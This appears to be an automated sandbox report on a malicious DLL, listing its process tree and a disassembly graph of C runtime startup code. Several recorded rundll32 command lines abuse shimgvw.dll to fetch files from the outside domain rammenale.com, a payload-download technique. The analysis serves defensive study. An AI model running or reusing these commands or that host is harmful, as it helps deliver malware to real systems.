              2024-08-29 04:53:04 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\System32\loaddll32.exe
              Wow64 process (32bit):true
              Commandline:loaddll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll"
              Imagebase:0x810000
              File size:126'464 bytes
              MD5 hash:51E6071F9CBA48E79F10C84515AAE618
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:1
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:2
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1
              Imagebase:0x790000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:3
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\QEydjQdRxs.dll,mydllmain
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:4
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe "C:\Users\user\Desktop\QEydjQdRxs.dll",#1
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:5
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:6
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:7
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:8
              Start time:00:52:58
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:11
              Start time:00:53:01
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:12
              Start time:00:53:01
              Start date:29/08/2024
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
              Imagebase:0x540000
              File size:61'440 bytes
              MD5 hash:889B99C52A60DD49227C5E485A016679
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:3.1%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:5.4%
                Total number of Nodes:2000
                Total number of Limit Nodes:33
                execution_graph 16504 6b934b07 16505 6b934b20 16504->16505 16506 6b934b3e 16504->16506 16505->16506 16507 6b930308 44 API calls 16505->16507 16508 6b930258 2 API calls 16505->16508 16507->16505 16508->16505 16055 6b924e89 16056 6b924e92 16055->16056 16057 6b924e97 16055->16057 16076 6b92508a 16056->16076 16061 6b924d53 16057->16061 16063 6b924d5f __FrameHandler3::FrameUnwindToState 16061->16063 16062 6b924d88 dllmain_raw 16064 6b924da2 dllmain_crt_dispatch 16062->16064 16065 6b924d6e 16062->16065 16063->16062 16063->16065 16066 6b924d83 16063->16066 16064->16065 16064->16066 16067 6b921000 __DllMainCRTStartup@12 130 API calls 16066->16067 16068 6b924dc3 16067->16068 16069 6b924df4 16068->16069 16072 6b921000 __DllMainCRTStartup@12 130 API calls 16068->16072 16069->16065 16070 6b924dfd dllmain_crt_dispatch 16069->16070 16070->16065 16071 6b924e10 dllmain_raw 16070->16071 16071->16065 16073 6b924ddb 16072->16073 16074 6b924ca3 __DllMainCRTStartup@12 150 API calls 16073->16074 16075 6b924de9 dllmain_raw 16074->16075 16075->16069 16077 6b9250a0 16076->16077 16079 6b9250a9 16077->16079 16080 6b92503d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 16077->16080 16079->16057 16080->16079 17221 6b92cc31 17222 6b931e26 ___scrt_uninitialize_crt 68 API calls 17221->17222 17223 6b92cc39 17222->17223 17231 6b931ad4 17223->17231 17225 6b92cc3e 17226 6b931e2f __DllMainCRTStartup@12 14 API calls 17225->17226 17227 6b92cc4d RtlDeleteCriticalSection 17226->17227 17227->17225 17228 6b92cc68 17227->17228 17229 6b930444 __freea 14 API calls 17228->17229 17230 6b92cc73 17229->17230 17232 6b931ae0 __FrameHandler3::FrameUnwindToState 17231->17232 17241 6b93351f RtlEnterCriticalSection 17232->17241 17234 6b931aeb 17235 6b931b57 17234->17235 17238 6b931b2b RtlDeleteCriticalSection 17234->17238 17239 6b92cec7 __DllMainCRTStartup@12 69 API calls 17234->17239 17242 6b931b76 17235->17242 17240 6b930444 __freea 14 API calls 17238->17240 17239->17234 17240->17234 17241->17234 17245 6b933567 RtlLeaveCriticalSection 17242->17245 17244 6b931b63 17244->17225 17245->17244 16096 6b9269a4 16097 6b9269bb 16096->16097 16100 6b92ed44 16097->16100 16111 6b934c7b 16100->16111 16104 6b92ed5e IsProcessorFeaturePresent 16106 6b92ed6a 16104->16106 16105 6b92ed54 16105->16104 16110 6b92ed7d 16105->16110 16141 6b92dcfd 16106->16141 16147 6b92e4c9 16110->16147 16150 6b934ba9 16111->16150 16114 6b934cc0 16119 6b934ccc __FrameHandler3::FrameUnwindToState 16114->16119 16115 6b92f5e8 __dosmaperr 14 API calls 16123 6b934cfd __FrameHandler3::FrameUnwindToState 16115->16123 16116 6b934d1c 16118 6b930431 __dosmaperr 14 API calls 16116->16118 16117 6b934d2e __FrameHandler3::FrameUnwindToState 16120 6b934d64 __FrameHandler3::FrameUnwindToState 16117->16120 16161 6b93351f RtlEnterCriticalSection 16117->16161 16121 6b934d21 16118->16121 16119->16115 16119->16116 16119->16117 16119->16123 16126 6b934da1 16120->16126 16127 6b934e9e 16120->16127 16137 6b934dcf 16120->16137 16124 6b92def9 ___std_exception_copy 39 API calls 16121->16124 16123->16116 16123->16117 16140 6b934d06 16123->16140 16124->16140 16132 6b92f497 _unexpected 39 API calls 16126->16132 16126->16137 16128 6b934ea9 16127->16128 16166 6b933567 RtlLeaveCriticalSection 16127->16166 16131 6b92e4c9 __FrameHandler3::FrameUnwindToState 21 API calls 16128->16131 16133 6b934eb1 16131->16133 16134 6b934dc4 16132->16134 16136 6b92f497 _unexpected 39 API calls 16134->16136 16135 6b92f497 _unexpected 39 API calls 16138 6b934e24 16135->16138 16136->16137 16162 6b934e4a 16137->16162 16139 6b92f497 _unexpected 39 API calls 16138->16139 16138->16140 16139->16140 16140->16105 16142 6b92dd19 __fread_nolock __FrameHandler3::FrameUnwindToState 16141->16142 16143 6b92dd45 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16142->16143 16146 6b92de16 __FrameHandler3::FrameUnwindToState 16143->16146 16144 6b924ad5 _ValidateLocalCookies 5 API calls 16145 6b92de34 16144->16145 16145->16110 16146->16144 16148 6b92e306 __FrameHandler3::FrameUnwindToState 21 API calls 16147->16148 16149 6b92e4da 16148->16149 16151 6b934bb5 __FrameHandler3::FrameUnwindToState 16150->16151 16156 6b93351f RtlEnterCriticalSection 16151->16156 16153 6b934bc3 16157 6b934c05 16153->16157 16156->16153 16160 6b933567 RtlLeaveCriticalSection 16157->16160 16159 6b92ed49 16159->16105 16159->16114 16160->16159 16161->16120 16163 6b934e16 16162->16163 16164 6b934e4e 16162->16164 16163->16135 16163->16138 16163->16140 16167 6b933567 RtlLeaveCriticalSection 16164->16167 16166->16128 16167->16163 13743 6b924b49 13744 6b924b87 13743->13744 13745 6b924b54 13743->13745 13782 6b924ca3 13744->13782 13747 6b924b79 13745->13747 13748 6b924b59 13745->13748 13755 6b924b9c 13747->13755 13750 6b924b5e 13748->13750 13751 6b924b6f 13748->13751 13754 6b924b63 13750->13754 13769 6b9251de 13750->13769 13774 6b9251bf 13751->13774 13756 6b924ba8 __FrameHandler3::FrameUnwindToState 13755->13756 13809 6b92524f 13756->13809 13758 6b924baf __DllMainCRTStartup@12 13759 6b924bd6 13758->13759 13760 6b924c9b 13758->13760 13766 6b924c12 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 13758->13766 13820 6b9251b1 13759->13820 13828 6b9253ee IsProcessorFeaturePresent 13760->13828 13763 6b924ca2 13764 6b924be5 __RTC_Initialize 13764->13766 13823 6b9250d5 RtlInitializeSListHead 13764->13823 13766->13754 13767 6b924bf3 13767->13766 13824 6b925186 13767->13824 14106 6b92ecbe 13769->14106 14312 6b92671c 13774->14312 13779 6b9251db 13779->13754 13780 6b926727 21 API calls 13781 6b9251c8 13780->13781 13781->13754 13783 6b924caf __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 13782->13783 13784 6b924ce0 13783->13784 13785 6b924d4b 13783->13785 13801 6b924cb8 13783->13801 14337 6b92521f 13784->14337 13786 6b9253ee __DllMainCRTStartup@12 4 API calls 13785->13786 13791 6b924d52 __FrameHandler3::FrameUnwindToState 13786->13791 13788 6b924ce5 14346 6b9250e1 13788->14346 13790 6b924cea __RTC_Initialize __DllMainCRTStartup@12 14349 6b9253c0 13790->14349 13792 6b924d88 dllmain_raw 13791->13792 13793 6b924d83 13791->13793 13805 6b924d6e 13791->13805 13794 6b924da2 dllmain_crt_dispatch 13792->13794 13792->13805 14332 6b921000 13793->14332 13794->13793 13794->13805 13801->13754 13805->13754 13810 6b925258 13809->13810 13832 6b9255eb IsProcessorFeaturePresent 13810->13832 13814 6b925269 13815 6b92526d 13814->13815 13842 6b92eca1 13814->13842 13815->13758 13818 6b925284 13818->13758 14100 6b925288 13820->14100 13822 6b9251b8 13822->13764 13823->13767 13825 6b92518b ___scrt_release_startup_lock 13824->13825 13826 6b9255eb IsProcessorFeaturePresent 13825->13826 13827 6b925194 13825->13827 13826->13827 13827->13766 13829 6b925404 __fread_nolock __FrameHandler3::FrameUnwindToState 13828->13829 13830 6b9254af IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13829->13830 13831 6b9254f3 __FrameHandler3::FrameUnwindToState 13830->13831 13831->13763 13833 6b925264 13832->13833 13834 6b9266fd 13833->13834 13851 6b9277a7 13834->13851 13836 6b926706 13836->13814 13839 6b92670e 13840 6b926719 13839->13840 13865 6b9277e3 13839->13865 13840->13814 13905 6b934b10 13842->13905 13845 6b92672f 13846 6b926742 13845->13846 13847 6b926738 13845->13847 13846->13815 13848 6b926868 ___vcrt_uninitialize_ptd 6 API calls 13847->13848 13849 6b92673d 13848->13849 13850 6b9277e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 13849->13850 13850->13846 13853 6b9277b0 13851->13853 13854 6b9277d9 13853->13854 13856 6b926702 13853->13856 13869 6b9279ec 13853->13869 13855 6b9277e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 13854->13855 13855->13856 13856->13836 13857 6b926835 13856->13857 13886 6b9278fd 13857->13886 13861 6b926865 13861->13839 13864 6b92684a 13864->13839 13866 6b92780d 13865->13866 13867 6b9277ee 13865->13867 13866->13836 13868 6b9277f8 RtlDeleteCriticalSection 13867->13868 13868->13866 13868->13868 13874 6b927812 13869->13874 13872 6b927a24 InitializeCriticalSectionAndSpinCount 13873 6b927a0f 13872->13873 13873->13853 13875 6b92782f 13874->13875 13876 6b927833 13874->13876 13875->13872 13875->13873 13876->13875 13877 6b92789b GetProcAddress 13876->13877 13879 6b92788c 13876->13879 13881 6b9278b2 LoadLibraryExW 13876->13881 13877->13875 13879->13877 13880 6b927894 FreeLibrary 13879->13880 13880->13877 13882 6b9278f9 13881->13882 13883 6b9278c9 GetLastError 13881->13883 13882->13876 13883->13882 13884 6b9278d4 ___vcrt_FlsGetValue 13883->13884 13884->13882 13885 6b9278ea LoadLibraryExW 13884->13885 13885->13876 13887 6b927812 ___vcrt_FlsGetValue 5 API calls 13886->13887 13888 6b927917 13887->13888 13889 6b927930 TlsAlloc 13888->13889 13890 6b92683f 13888->13890 13890->13864 13891 6b9279ae 13890->13891 13892 6b927812 ___vcrt_FlsGetValue 5 API calls 13891->13892 13893 6b9279c8 13892->13893 13894 6b9279e3 TlsSetValue 13893->13894 13895 6b926858 13893->13895 13894->13895 13895->13861 13896 6b926868 13895->13896 13897 6b926872 13896->13897 13898 6b926878 13896->13898 13900 6b927938 13897->13900 13898->13864 13901 6b927812 ___vcrt_FlsGetValue 5 API calls 13900->13901 13902 6b927952 13901->13902 13903 6b92796a TlsFree 13902->13903 13904 6b92795e 13902->13904 13903->13904 13904->13898 13906 6b934b20 13905->13906 13907 6b925276 13905->13907 13906->13907 13910 6b930308 13906->13910 13922 6b930258 13906->13922 13907->13818 13907->13845 13911 6b930314 __FrameHandler3::FrameUnwindToState 13910->13911 13927 6b93351f RtlEnterCriticalSection 13911->13927 13913 6b93031b 13928 6b934fc4 13913->13928 13916 6b930339 13947 6b93035f 13916->13947 13921 6b930258 2 API calls 13921->13916 13923 6b93025f 13922->13923 13924 6b9302a2 GetStdHandle 13923->13924 13925 6b930304 13923->13925 13926 6b9302b5 GetFileType 13923->13926 13924->13923 13925->13906 13926->13923 13927->13913 13929 6b934fd0 __FrameHandler3::FrameUnwindToState 13928->13929 13930 6b934ffa 13929->13930 13931 6b934fd9 13929->13931 13950 6b93351f RtlEnterCriticalSection 13930->13950 13958 6b930431 13931->13958 13937 6b935032 13963 6b935059 13937->13963 13939 6b935006 13939->13937 13951 6b934f14 13939->13951 13941 6b9301a2 GetStartupInfoW 13942 6b930253 13941->13942 13943 6b9301bf 13941->13943 13942->13921 13943->13942 13944 6b934fc4 40 API calls 13943->13944 13945 6b9301e7 13944->13945 13945->13942 13946 6b930217 GetFileType 13945->13946 13946->13945 14099 6b933567 RtlLeaveCriticalSection 13947->14099 13949 6b93034a 13949->13906 13950->13939 13966 6b931658 13951->13966 13953 6b934f26 13957 6b934f33 13953->13957 13973 6b9319b1 13953->13973 13978 6b930444 13957->13978 14007 6b92f5e8 GetLastError 13958->14007 13960 6b930436 13961 6b92def9 13960->13961 14059 6b92de45 13961->14059 14098 6b933567 RtlLeaveCriticalSection 13963->14098 13965 6b93032a 13965->13916 13965->13941 13967 6b931665 _unexpected 13966->13967 13968 6b9316a5 13967->13968 13969 6b931690 RtlAllocateHeap 13967->13969 13984 6b92df8f 13967->13984 13971 6b930431 __dosmaperr 13 API calls 13968->13971 13969->13967 13970 6b9316a3 13969->13970 13970->13953 13971->13970 13993 6b9317ce 13973->13993 13975 6b9319cd 13976 6b9319eb InitializeCriticalSectionAndSpinCount 13975->13976 13977 6b9319d6 13975->13977 13976->13977 13977->13953 13979 6b93044f HeapFree 13978->13979 13983 6b930479 13978->13983 13980 6b930464 GetLastError 13979->13980 13979->13983 13981 6b930471 __dosmaperr 13980->13981 13982 6b930431 __dosmaperr 12 API calls 13981->13982 13982->13983 13983->13939 13987 6b92dfbb 13984->13987 13988 6b92dfc7 __FrameHandler3::FrameUnwindToState 13987->13988 13989 6b93351f __FrameHandler3::FrameUnwindToState RtlEnterCriticalSection 13988->13989 13990 6b92dfd2 __FrameHandler3::FrameUnwindToState 13989->13990 13991 6b92e009 _unexpected RtlLeaveCriticalSection 13990->13991 13992 6b92df9a 13991->13992 13992->13967 13994 6b9317fe 13993->13994 13998 6b9317fa _unexpected 13993->13998 13994->13998 13999 6b931703 13994->13999 13997 6b931818 GetProcAddress 13997->13998 13998->13975 14005 6b931714 ___vcrt_FlsGetValue 13999->14005 14000 6b9317aa 14000->13997 14000->13998 14001 6b931732 LoadLibraryExW 14002 6b9317b1 14001->14002 14003 6b93174d GetLastError 14001->14003 14002->14000 14004 6b9317c3 FreeLibrary 14002->14004 14003->14005 14004->14000 14005->14000 14005->14001 14006 6b931780 LoadLibraryExW 14005->14006 14006->14002 14006->14005 14008 6b92f5fe 14007->14008 14012 6b92f604 14007->14012 14030 6b931930 14008->14030 14027 6b92f608 SetLastError 14012->14027 14035 6b93196f 14012->14035 14014 6b931658 _unexpected 12 API calls 14015 6b92f635 14014->14015 14016 6b92f64e 14015->14016 14017 6b92f63d 14015->14017 14019 6b93196f _unexpected 6 API calls 14016->14019 14018 6b93196f _unexpected 6 API calls 14017->14018 14020 6b92f64b 14018->14020 14021 6b92f65a 14019->14021 14024 6b930444 __freea 12 API calls 14020->14024 14022 6b92f675 14021->14022 14023 6b92f65e 14021->14023 14040 6b92f299 14022->14040 14026 6b93196f _unexpected 6 API calls 14023->14026 14024->14027 14026->14020 14027->13960 14029 6b930444 __freea 12 API calls 14029->14027 14031 6b9317ce _unexpected 5 API calls 14030->14031 14032 6b93194c 14031->14032 14033 6b931967 TlsGetValue 14032->14033 14034 6b931955 14032->14034 14034->14012 14036 6b9317ce _unexpected 5 API calls 14035->14036 14037 6b93198b 14036->14037 14038 6b92f620 14037->14038 14039 6b9319a9 TlsSetValue 14037->14039 14038->14014 14038->14027 14045 6b92f12d 14040->14045 14046 6b92f139 __FrameHandler3::FrameUnwindToState 14045->14046 14047 6b93351f __FrameHandler3::FrameUnwindToState RtlEnterCriticalSection 14046->14047 14048 6b92f143 14047->14048 14049 6b92f173 _unexpected RtlLeaveCriticalSection 14048->14049 14050 6b92f161 14049->14050 14051 6b92f23f 14050->14051 14052 6b92f24b __FrameHandler3::FrameUnwindToState 14051->14052 14053 6b93351f __FrameHandler3::FrameUnwindToState RtlEnterCriticalSection 14052->14053 14054 6b92f255 14053->14054 14055 6b92f420 _unexpected 14 API calls 14054->14055 14056 6b92f26d 14055->14056 14057 6b92f28d _unexpected RtlLeaveCriticalSection 14056->14057 14058 6b92f27b 14057->14058 14058->14029 14060 6b92de57 __vfwprintf_l 14059->14060 14065 6b92de7c 14060->14065 14066 6b92de93 14065->14066 14067 6b92de8c 14065->14067 14069 6b92de6f 14066->14069 14084 6b92dcd4 14066->14084 14080 6b928151 GetLastError 14067->14080 14074 6b927d4e 14069->14074 14071 6b92dec8 14071->14069 14087 6b92df26 IsProcessorFeaturePresent 14071->14087 14073 6b92def8 14075 6b927d5a 14074->14075 14076 6b927d71 14075->14076 14091 6b928197 14075->14091 14078 6b927d84 14076->14078 14079 6b928197 __vfwprintf_l 39 API calls 14076->14079 14079->14078 14081 6b92816a 14080->14081 14082 6b92f699 __vfwprintf_l 14 API calls 14081->14082 14083 6b928182 SetLastError 14082->14083 14083->14066 14085 6b92dcf8 14084->14085 14086 6b92dcdf GetLastError SetLastError 14084->14086 14085->14071 14086->14071 14088 6b92df32 14087->14088 14089 6b92dcfd __FrameHandler3::FrameUnwindToState 8 API calls 14088->14089 14090 6b92df47 GetCurrentProcess TerminateProcess 14089->14090 14090->14073 14092 6b9281a1 14091->14092 14093 6b9281aa 14091->14093 14094 6b928151 __vfwprintf_l 16 API calls 14092->14094 14093->14076 14095 6b9281a6 14094->14095 14095->14093 14096 6b92ed44 __FrameHandler3::FrameUnwindToState 39 API calls 14095->14096 14097 6b9281b3 14096->14097 14098->13965 14099->13949 14101 6b925294 14100->14101 14102 6b925298 14100->14102 14101->13822 14103 6b9253ee __DllMainCRTStartup@12 4 API calls 14102->14103 14105 6b9252a5 ___scrt_release_startup_lock 14102->14105 14104 6b92530e 14103->14104 14105->13822 14112 6b92f46b 14106->14112 14109 6b926727 14292 6b92676a 14109->14292 14113 6b92f475 14112->14113 14116 6b9251e3 14112->14116 14114 6b931930 _unexpected 6 API calls 14113->14114 14115 6b92f47c 14114->14115 14115->14116 14117 6b93196f _unexpected 6 API calls 14115->14117 14116->14109 14118 6b92f48f 14117->14118 14120 6b92f332 14118->14120 14121 6b92f34d 14120->14121 14122 6b92f33d 14120->14122 14121->14116 14126 6b92f353 14122->14126 14125 6b930444 __freea 14 API calls 14125->14121 14127 6b92f36e 14126->14127 14128 6b92f368 14126->14128 14130 6b930444 __freea 14 API calls 14127->14130 14129 6b930444 __freea 14 API calls 14128->14129 14129->14127 14131 6b92f37a 14130->14131 14132 6b930444 __freea 14 API calls 14131->14132 14133 6b92f385 14132->14133 14134 6b930444 __freea 14 API calls 14133->14134 14135 6b92f390 14134->14135 14136 6b930444 __freea 14 API calls 14135->14136 14137 6b92f39b 14136->14137 14138 6b930444 __freea 14 API calls 14137->14138 14139 6b92f3a6 14138->14139 14140 6b930444 __freea 14 API calls 14139->14140 14141 6b92f3b1 14140->14141 14142 6b930444 __freea 14 API calls 14141->14142 14143 6b92f3bc 14142->14143 14144 6b930444 __freea 14 API calls 14143->14144 14145 6b92f3c7 14144->14145 14146 6b930444 __freea 14 API calls 14145->14146 14147 6b92f3d5 14146->14147 14152 6b92f17f 14147->14152 14153 6b92f18b __FrameHandler3::FrameUnwindToState 14152->14153 14168 6b93351f RtlEnterCriticalSection 14153->14168 14155 6b92f195 14158 6b930444 __freea 14 API calls 14155->14158 14159 6b92f1bf 14155->14159 14158->14159 14169 6b92f1de 14159->14169 14160 6b92f1ea 14161 6b92f1f6 __FrameHandler3::FrameUnwindToState 14160->14161 14173 6b93351f RtlEnterCriticalSection 14161->14173 14163 6b92f200 14174 6b92f420 14163->14174 14165 6b92f213 14178 6b92f233 14165->14178 14168->14155 14172 6b933567 RtlLeaveCriticalSection 14169->14172 14171 6b92f1cc 14171->14160 14172->14171 14173->14163 14175 6b92f42f _unexpected 14174->14175 14177 6b92f456 _unexpected 14174->14177 14175->14177 14181 6b9353c5 14175->14181 14177->14165 14291 6b933567 RtlLeaveCriticalSection 14178->14291 14180 6b92f221 14180->14125 14182 6b935445 14181->14182 14184 6b9353db 14181->14184 14185 6b930444 __freea 14 API calls 14182->14185 14207 6b935493 14182->14207 14184->14182 14186 6b93540e 14184->14186 14190 6b930444 __freea 14 API calls 14184->14190 14187 6b935467 14185->14187 14196 6b930444 __freea 14 API calls 14186->14196 14206 6b935430 14186->14206 14188 6b930444 __freea 14 API calls 14187->14188 14191 6b93547a 14188->14191 14189 6b930444 __freea 14 API calls 14192 6b93543a 14189->14192 14194 6b935403 14190->14194 14197 6b930444 __freea 14 API calls 14191->14197 14198 6b930444 __freea 14 API calls 14192->14198 14193 6b935501 14199 6b930444 __freea 14 API calls 14193->14199 14209 6b9356e2 14194->14209 14195 6b9354a1 14195->14193 14208 6b930444 14 API calls __freea 14195->14208 14201 6b935425 14196->14201 14202 6b935488 14197->14202 14198->14182 14203 6b935507 14199->14203 14237 6b9357e0 14201->14237 14205 6b930444 __freea 14 API calls 14202->14205 14203->14177 14205->14207 14206->14189 14249 6b935536 14207->14249 14208->14195 14210 6b9356f3 14209->14210 14236 6b9357dc 14209->14236 14211 6b935704 14210->14211 14212 6b930444 __freea 14 API calls 14210->14212 14213 6b935716 14211->14213 14214 6b930444 __freea 14 API calls 14211->14214 14212->14211 14215 6b930444 __freea 14 API calls 14213->14215 14217 6b935728 14213->14217 14214->14213 14215->14217 14216 6b93574c 14220 6b93575e 14216->14220 14222 6b930444 __freea 14 API calls 14216->14222 14218 6b930444 __freea 14 API calls 14217->14218 14221 6b93573a 14217->14221 14218->14221 14219 6b930444 __freea 14 API calls 14219->14216 14223 6b935770 14220->14223 14224 6b930444 __freea 14 API calls 14220->14224 14221->14216 14221->14219 14222->14220 14225 6b935782 14223->14225 14227 6b930444 __freea 14 API calls 14223->14227 14224->14223 14226 6b935794 14225->14226 14228 6b930444 __freea 14 API calls 14225->14228 14229 6b9357a6 14226->14229 14230 6b930444 __freea 14 API calls 14226->14230 14227->14225 14228->14226 14231 6b9357b8 14229->14231 14232 6b930444 __freea 14 API calls 14229->14232 14230->14229 14233 6b9357ca 14231->14233 14234 6b930444 __freea 14 API calls 14231->14234 14232->14231 14235 6b930444 __freea 14 API calls 14233->14235 14233->14236 14234->14233 14235->14236 14236->14186 14238 6b9357ed 14237->14238 14248 6b935845 14237->14248 14239 6b9357fd 14238->14239 14241 6b930444 __freea 14 API calls 14238->14241 14240 6b93580f 14239->14240 14242 6b930444 __freea 14 API calls 14239->14242 14243 6b935821 14240->14243 14244 6b930444 __freea 14 API calls 14240->14244 14241->14239 14242->14240 14245 6b935833 14243->14245 14246 6b930444 __freea 14 API calls 14243->14246 14244->14243 14247 6b930444 __freea 14 API calls 14245->14247 14245->14248 14246->14245 14247->14248 14248->14206 14250 6b935543 14249->14250 14254 6b935562 14249->14254 14250->14254 14255 6b93586e 14250->14255 14253 6b930444 __freea 14 API calls 14253->14254 14254->14195 14256 6b93555c 14255->14256 14257 6b93587f 14255->14257 14256->14253 14258 6b935849 _unexpected 14 API calls 14257->14258 14259 6b935887 14258->14259 14260 6b935849 _unexpected 14 API calls 14259->14260 14261 6b935892 14260->14261 14262 6b935849 _unexpected 14 API calls 14261->14262 14263 6b93589d 14262->14263 14264 6b935849 _unexpected 14 API calls 14263->14264 14265 6b9358a8 14264->14265 14266 6b935849 _unexpected 14 API calls 14265->14266 14267 6b9358b6 14266->14267 14268 6b930444 __freea 14 API calls 14267->14268 14269 6b9358c1 14268->14269 14270 6b930444 __freea 14 API calls 14269->14270 14271 6b9358cc 14270->14271 14272 6b930444 __freea 14 API calls 14271->14272 14273 6b9358d7 14272->14273 14274 6b935849 _unexpected 14 API calls 14273->14274 14275 6b9358e5 14274->14275 14276 6b935849 _unexpected 14 API calls 14275->14276 14277 6b9358f3 14276->14277 14278 6b935849 _unexpected 14 API calls 14277->14278 14279 6b935904 14278->14279 14280 6b935849 _unexpected 14 API calls 14279->14280 14281 6b935912 14280->14281 14282 6b935849 _unexpected 14 API calls 14281->14282 14283 6b935920 14282->14283 14284 6b930444 __freea 14 API calls 14283->14284 14285 6b93592b 14284->14285 14286 6b930444 __freea 14 